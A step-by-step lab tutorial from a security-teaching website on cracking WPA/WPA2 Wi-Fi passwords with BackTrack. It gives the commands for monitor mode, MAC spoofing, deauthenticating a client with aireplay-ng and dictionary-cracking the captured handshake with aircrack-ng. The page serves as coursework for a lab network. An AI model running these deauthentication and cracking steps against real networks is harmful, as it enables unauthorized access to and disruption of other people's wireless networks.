ComputerSecurityStudent (CSS) [Login] [Join Now]




|SECURITY TOOLS >> Wireless Cracking >> Current Page |Views: 27276

(Wireless: Lesson 2)

{ Hacking WPA/WPA2 Encryption from A to Z }


Section 0. Background Information
  • WPA2 Cracking Overview
    • In this lab, I will show you how to do the following:
      1. How to obtain/buy the type of wireless card that is compatible with Backtrack that allows for packet injection.
        • Note:  If you don't already have this special wireless card, please purchase it from this webpage and I will receive a 3% commission.
      2. Where to download the Linksys USB54GC ver 3 drivers.
      3. How to Install the Linksys USB54GC ver 3 drivers.
      4. How to use BackTrack to crack the WPA or WPA2 cipher on a live router.

       

  • Supplement Links
  • Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either expressed or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • Your are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2012 No content replication of any kind is allowed without express written permission.
Section 1. Obtaining Your BackTrack Compatible Wireless Card
  1. Obtain a BackTrack Compatible Wireless Card
    • Instructions:
      1. You can purchase your BackTrack Compatible Wireless Card from this website using the following choices on your far right.
      2. For this lab I will be using Linksys WUSB54GC ver 3.
    • Other BackTrack Compatible Wireless Cards:
      1. http://www.backtrack-linux.org/wiki/index.php/Wireless_Drivers#Wireless_Drivers
        1. AWUS036H (rtl8187, r8187) - both mac80211 and IEEE drivers - passed
        2. AWUS036NH (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers - passed
        3. BCM4312 802.11b/g LP-PHY (rev 01) - using the mac80211 b43, works well - passed
        4. Rockland N3 - (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers -passed
        5. Edimax EW-7318USG USB - (Ralink RT2501/RT2573) - using the mac80211 rt2500usb/rt73usb drivers -passed
        6. ASUSTek Computer, Inc. RT2573 - using the mac80211 rt2500usb/rt73usb drivers -passed
        7. Linksys WUSB54GC ver 3 - using the mac80211 rt2800usb drivers -passed
        8. Ubiquiti SRC - using the mac80211 ath9k drivers-passed
        9. Internal Intel Corporation PRO/Wireless 3945ABG - using the mac80211 iwl3945 drivers-passed
        10. Dlink WNA-2330 PCMCIA - using the mac80211 ath5k drivers-passed
        11. Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01) - using the mac80211 ath9k drivers-passed
        12. Netgear wg111v2 - using the mac80211 rtl8187 drivers-passed
        13. ZyXEL AG-225H v2 - using the mac80211 zd1211 drivers - passed
        14. Intel 4956/5xxx - using the iwlagn drivers - passed

 

Section 2. Installing the Wireless Card
  1. Obtain a BackTrack Compatible Wireless Card Drivers

     

  2. Saving the Driver
    • Instructions:
      1. On my Host machine, I am saving the driver to the following location.
      2. C:\Linksys Drivers\

     

  3. Extract Files
    • Instructions:
      1. Right Click on x64,0.zip
        • Note: In my case, I download the 64 bit version.  If you selected the 32 bit version for Windows 7, you will see x86,0.zip
      2. Extract to x64,0

     

  4. Insert your Card
    • Instructions:
      1. Insert your Wireless 802.11 g wlan linksys card into the host machine.

     

  5. Bring up Device Manager
    • Instructions:
      1. Start --> Control Panel --> System --> Device Manager

     

  6. Select Device for the Driver Installation
    • Instructions:
      1. Right Click on 802.11 g WLAN
      2. Select Update Driver Software

     

  7. Select Driver Location
    • Instructions:
      1. Click on Browse my computer

     

  8. Browse to Driver Location
    • Instructions:
      1. Click on Browse Button
      2. Navigate to the location where you save the Linksys Drivers.
      3. Click Next.

     

  9. Windows Success Message
    • Instructions:
      1. Click the Close Button.

 

Section 3. Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player

     

  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Do not Click on the OK Button.
  1. Edit USB Controller
    • Instructions:
      1. Highlight USB Controller
      2. Select the first three check boxes, especially the "Show all USB input devices" checkbox.
      3. Click on the OK Button.

 

Section 4. Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine

     

  2. USB Device Message
    • Instructions:
      1. If you see this USB Device Message, Select OK.

     

  3. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  4. Connect the Wireless Linksys 802.11g wlan card
    • Instructions:
      1. Virtual Machine --> Virtual Machine Settings --> Removable Devices --> linksys 802.11 g wlan --> Connect

     

  5. USB Device Message
    • Instructions:
      1. If you see this USB Device Message, Select OK.

     

  6. Verify Wireless Card is Visible for the BackTrack VM.
    • Instructions:
      1. Look at the VMWare Tray in the lower right corner.
      2. Look for a USB Icon.
      3. If you run your mouse over the USB Icon, it should say Linksys 802.11g wlan.

     

  7. Verify ifconfig see the wireless card
    • Instructions:
      1. ifconfig -a
    • Note:
      • You should see another interface called wlan0.
      • If you do, then you are well on your way to hacking WEP.

     

  8. Bring up the GNOME
    • Instructions:
      1. Type startx

 

Section 5. Bring up a console terminal and Load mac80211 Drivers
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal

     

  2. Load Drivers
    • Instructions:
      1. modprobe rtl8187
        • The character after the "t" is the character "l" as in lion. one.
        • The character after the "8" is the number one.

 

Section 6. Enable Monitor Mode
  1. Enable Monitor Mode
    • Instructions:
      1. airmon-ng start wlan0

 

Section 7. Change MAC address for mon0 interface
  1. Temporarily bring down the mon0 interface
    • Instructions:
      1. ifconfig mon0 down
      2. ifconfig mon0
        • Notice there is no "UP" in front of the word BROADCAST on the second line.
    • Notes:
      1. In order to change the MAC address of any interface, you must bring down the that particular interface before changing it.

     

  2. Change MAC Address
    • Instructions:
      1. macchanger -m 00:11:22:33:44:55 mon0
        • Change MAC Address for the mon0 interface
      2. ifconfig mon0 up
        • Plumb up the mon0 interface.
      3. ifconfig mon0
        • Verify the mon0 interface is up.
        • Notice the word "UP" in front of the word BROADCAST on the second line.
        • Also, notice on the first line that you have a new MAC Address.
    •  

 

Section 8. View Surrounding Wireless Networks
  1. View surrounding wireless networks
    • Instructions:
      1. airodump-ng mon0
      2. Continue to Next Step.

     

  2. Finding a potential victim
    • Instructions:
      1. In our case, the victim SID is WPA2CRACK.
      2. Once you see WPA2CRACK, Press the <Ctrl> and "c" keys at the same time to stop the scan.
      3. Record WPA2CRACK's BSSID (00:14:BF:D1:D1:29) and Channel (6).

 

Section 9. Let the Injection and Cracking Begin
  1. Open Two Terminal Consoles
    • Instructions:
      1. Click the terminal console icon twice and position your screens like mine.

     

  2. Fire up airodump
    • Instructions:
      1. airodump-ng -c 6 -w crack_output.txt --bssid 00:14:BF:D1:D1:29 --ivs mon0
        • -c, specifies the channel.  In my case, it will be channel 6.
          • Obtained in Section 8, Step 2.
        • -w, specifies an output file required for aircrack-ng.
          • Obtained in Section 8, Step 2.
        • --bssid, specifies the victims BSSID.
        • --ivs, specifies the initialization vectors  used by aircrack-ng.
        • mon0, is wan0's promiscuous monitor interface.
      2. Continue to Next Step.

     

  3. Copy the Access Point and Client BSSID's
    • Instructions:
      1. When you see a line below the STATION, Press <Ctrl> and "c".
      2. Highlight both the Access Point and Client BSSID's.
      3. Right Click and Copy.

     

  4. Paste the Access Point and Client BSSID's in Notepad
    • Instructions:
      1. Applications --> Wine --> Programs --> Accessories --> Notepad
      2. Edit --> Paste

     

  5. Restart airodump-ng
    • Instructions:
      1. airodump-ng -c 6 -w crack_output.txt --bssid 00:14:BF:D1:D1:29 --ivs mon0
      2. Continue to Next Step

     

  6. Send Authentication Request to Victim
    • Instructions: (See Below Pictures First)
      1. In the bottom window, type the following command
        • aireplay-ng -0 1 -a 00:14:BF:D1:D1:29 -c 00:23:14:BA:54:20 -e WPA2CRACK mon0
          • This will send a de-authentication request to the victim BSSID to receive a WPA Handshake.
          • -0, This flag sends disassocated packets to one or more clients which are currently associated with a particular access point.
          • -a 00:14:BF:D1:D1:29, where "00:14:BF:D1:D1:29" is the access point BSSID.
          • -c 00:23:14:BA:54:20, where "00:23:14:BA:54:20" is the client BSSID
    • Note:
      • The Access Point and Client BSSID was obtained in Section 9, Step 4.

     

  7. Wait for WPA handshake message
    • Instructions:
      1. In top window, hit <Ctrl> and "c", after you see the WPA handshake message.

     

  8. Run aircrack-ng
    • Instructions:
      1. aircrack-ng -w /pentest/passwords/john/password.lst crack_output.txt-02.ivs
        • -w, specifies the password list that will be used by aircrack.
        •  crack_output.txt-02.ivs is your output file that contains the initialization vector (IV) captured after sending WPA2CRACK a deauth request.

     

  9. Review aircrack-ng password results
    • Note:
      1. Look for the message KEY FOUND.
      2. Remember WPA and WPA2 is strong if your password is strong, otherwise, it is easier to crack than WEP.

 

Section 10. Proof of Lab
  1. Proof of Lab
    • Instructions
    • :
      1. cd
      2. ls -l crack_output*
      3. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • E.g., echo "John Gray"
    • Proof Of Lab Instructions:
      1. Do a <PrtScn>
      2. Paste into a word document
      3. Upload to Moodle


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth